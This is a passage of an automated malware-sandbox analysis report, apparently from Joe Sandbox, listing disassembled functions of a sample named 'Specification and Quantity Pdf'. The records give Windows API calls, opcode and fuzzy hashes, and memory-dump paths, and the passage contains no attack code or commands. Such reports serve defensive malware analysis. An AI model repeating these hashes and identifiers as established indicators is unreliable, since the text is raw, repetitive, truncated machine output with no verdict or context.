            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
            • Instruction ID: 9f8c9d9a9a9b58664008e9a61813bb5625f5da37ddde72b4170ba1bc42b250c6
            • Opcode Fuzzy Hash: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
            • Instruction Fuzzy Hash: 7571A323A3D64281FAD4BB6195402B9F3A1AF60B94F980036DE5D277D9DF3CE4508360
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug
            • String ID:
            • API String ID: 456121617-0
            • Opcode ID: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
            • Instruction ID: 6ed45743f4d85db753fea47c6468181fc15973a77ee74ef547de66ad0df2264d
            • Opcode Fuzzy Hash: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
            • Instruction Fuzzy Hash: 0A51B423B39A4699EB94BB51C0412BCB3A1FB44B94F975136CA1D233D1EE3DE581C361
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSectionSwitchThread$Leave$Enter
            • String ID:
            • API String ID: 1765607624-0
            • Opcode ID: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
            • Instruction ID: 8903eee25086a6037786de31b7048752ea8f164bd83d28f07373a5629a6652a4
            • Opcode Fuzzy Hash: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
            • Instruction Fuzzy Hash: 27519F33E3C10B86F6D4BBA4A841579F690EF00711FD84236E86DB62E2DF2DB8549670
            APIs
            • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91E89
            • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91EA1
            • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91EB9
            • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91ED7
            • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91EFC
            • DebugBreak.KERNEL32 ref: 00007FF773C91F30
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug
            • String ID:
            • API String ID: 456121617-0
            • Opcode ID: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
            • Instruction ID: ab55a1503ee2787f7d2f35d451d3a1bb733b64789a43bd356d243500194ba856
            • Opcode Fuzzy Hash: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
            • Instruction Fuzzy Hash: EE41B223A3C69689F7D1BB61900127EF791EF44B94F990035EE4D266D6DE3CE881C3A1
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
            • String ID:
            • API String ID: 510365852-3916222277
            • Opcode ID: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
            • Instruction ID: e39af4df13b03e369982299709eb894161c9cdf665a55fa9ab513fb129bbcee8
            • Opcode Fuzzy Hash: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
            • Instruction Fuzzy Hash: F0118E73628B818AD7A0EF25B4401AAB760FB457B4F584335E6BE1BAD6CF78D0428700
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3168844106-0
            • Opcode ID: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
            • Instruction ID: ca0a9a85667fffdec80be5efe1368ec1786e6c702750d6f1ad3d04286c02c914
            • Opcode Fuzzy Hash: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
            • Instruction Fuzzy Hash: 67610F2393CB4685EAD0AB95E8803B5F394AF44790FD40536D98D63795DF3CE16583A0
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3168844106-0
            • Opcode ID: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
            • Instruction ID: ec2f83ac161d64541a0050ccd079c44115dad6b5ec52ab4a1ebb76ab50ee4325
            • Opcode Fuzzy Hash: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
            • Instruction Fuzzy Hash: 2451FB3693CB8681EAE0AB54E8813B5F3A4EF84794FD40136C98D63695DF3CE16587A0
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: ExceptionFailFastRaise
            • String ID: Process is terminating due to StackOverflowException.
            • API String ID: 2546344036-2200901744
            • Opcode ID: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
            • Instruction ID: 58ecec5b821ab83334801fcbe04e9667070cbef85b30fe101e782dad521bc630
            • Opcode Fuzzy Hash: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
            • Instruction Fuzzy Hash: 2151B167F3964281EED0AB15D4503B8A391FB48B84FE84137EA5E677E0DF2DE4558320
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: SwitchThread
            • String ID:
            • API String ID: 115865932-0
            • Opcode ID: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
            • Instruction ID: ddf9d14a1b6db39859b18bae229e151cb2a903f1738658667ee833b58bcc91bd
            • Opcode Fuzzy Hash: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
            • Instruction Fuzzy Hash: 8541B573B3966686FBE06E25D04063DB290EB40B94F95913ADB0E567C9EF3CE440C726
            APIs
            • DebugBreak.KERNEL32(?,00000000,?,00007FF773C6E7B5,?,?,0000000100000001,00007FF773C7CA48), ref: 00007FF773C90F49
            • DebugBreak.KERNEL32(?,00000000,?,00007FF773C6E7B5,?,?,0000000100000001,00007FF773C7CA48), ref: 00007FF773C90F66
            • DebugBreak.KERNEL32(?,00000000,?,00007FF773C6E7B5,?,?,0000000100000001,00007FF773C7CA48), ref: 00007FF773C90F81
            • DebugBreak.KERNEL32(?,00000000,?,00007FF773C6E7B5,?,?,0000000100000001,00007FF773C7CA48), ref: 00007FF773C90F9A
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug
            • String ID:
            • API String ID: 456121617-0
            • Opcode ID: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
            • Instruction ID: b083748a55d08f2d26c194cfd8ecb8ae9d67a54aa5f605bc42eec7e982c88213
            • Opcode Fuzzy Hash: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
            • Instruction Fuzzy Hash: 6C41B423A3D6A685FAD16B509500379F6E0EF44B58F9A0435DE8C272C5EE7CE482C362
            APIs
            • DebugBreak.KERNEL32(?,?,00000000,?,00007FF773C7B16E,?,?,-8000000000000000,00007FF773C8E9AE,?,?,?,00007FF773C688C3), ref: 00007FF773C7F339
            • DebugBreak.KERNEL32(?,?,00000000,?,00007FF773C7B16E,?,?,-8000000000000000,00007FF773C8E9AE,?,?,?,00007FF773C688C3), ref: 00007FF773C7F356
            • DebugBreak.KERNEL32(?,?,00000000,?,00007FF773C7B16E,?,?,-8000000000000000,00007FF773C8E9AE,?,?,?,00007FF773C688C3), ref: 00007FF773C7F376
            • DebugBreak.KERNEL32(?,?,00000000,?,00007FF773C7B16E,?,?,-8000000000000000,00007FF773C8E9AE,?,?,?,00007FF773C688C3), ref: 00007FF773C7F399
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug
            • String ID:
            • API String ID: 456121617-0
            • Opcode ID: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
            • Instruction ID: e407ec399ba669a42727bafb5b4eafcc69eb7f63cfde6182331d081f0bd90821
            • Opcode Fuzzy Hash: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
            • Instruction Fuzzy Hash: F9318F6363AB4682EBA4BB65A080279F7A8FF44B95F980035DE4D676D5CF3CE441C360
            APIs
            • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF773C553F1), ref: 00007FF773C5B554
            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF773C553F1), ref: 00007FF773C5B55E
            • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF773C553F1), ref: 00007FF773C5B57D
            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF773C553F1), ref: 00007FF773C5B591
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: ErrorLastMultipleWait$HandlesObjects
            • String ID:
            • API String ID: 2817213684-0
            • Opcode ID: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
            • Instruction ID: 8c4cb1541dc72e1369228b76f650362c70f6a3f58e9ce8966d14520627c267be
            • Opcode Fuzzy Hash: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
            • Instruction Fuzzy Hash: BD114F32B3CA55C2D7586B69A40013AE661FB84795FA40136EADD53A99CF3CD4148B50
            APIs
            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773CBB963), ref: 00007FF773CBC6A8
            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773CBB963), ref: 00007FF773CBC6E9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: ExceptionFileHeaderRaise
            • String ID: csm
            • API String ID: 2573137834-1018135373
            • Opcode ID: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
            • Instruction ID: 6cf663165876e9a3e3c8731fc956d3347fe14fa035b5c46c7e34acccde17ed61
            • Opcode Fuzzy Hash: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
            • Instruction Fuzzy Hash: 48112E33629B8182EB619F15F440269B7E4FB88B88F588231DECD17764DF3CD5518B00
            APIs
            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF773C5C313,?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5D08B
            • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF773C5C313,?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5D0C8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: _stricmpstrtoull
            • String ID: HeapVerify
            • API String ID: 4031153986-2674988305
            • Opcode ID: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
            • Instruction ID: 79a591e5c665b53a7b796d57d89c3fd90fa47b0ff2a3a73249c59da8cd548b9a
            • Opcode Fuzzy Hash: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
            • Instruction Fuzzy Hash: 06018033A39A4589E791BF11E880079F3A0FB987C0F999072DA9D13A49DF3CD4828610
            APIs
            • EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF773C6D6BF,01FFF001,00000000,00000000,00007FF773C7BD4F), ref: 00007FF773C832ED
            • LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF773C6D6BF,01FFF001,00000000,00000000,00007FF773C7BD4F), ref: 00007FF773C8333E
            • EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF773C6D6BF,01FFF001,00000000,00000000,00007FF773C7BD4F), ref: 00007FF773C83374
            • LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF773C6D6BF,01FFF001,00000000,00000000,00007FF773C7BD4F), ref: 00007FF773C8338F
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3168844106-0
            • Opcode ID: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
            • Instruction ID: a5dad76e86bec13ebaebeb0fac877af5c57d9f02006c077d7a7a714802215aaa
            • Opcode Fuzzy Hash: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
            • Instruction Fuzzy Hash: E8418027A3C64281EA90AF61E4503B5F350EB45794F980232DD9D67AD5CF3DF2558360
            APIs
            • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF773C7419F,?,?,?,00007FF773C81E7B), ref: 00007FF773C7406A
            • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF773C7419F,?,?,?,00007FF773C81E7B), ref: 00007FF773C740AC
            • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF773C7419F,?,?,?,00007FF773C81E7B), ref: 00007FF773C740D7
            • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF773C7419F,?,?,?,00007FF773C81E7B), ref: 00007FF773C740F8
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
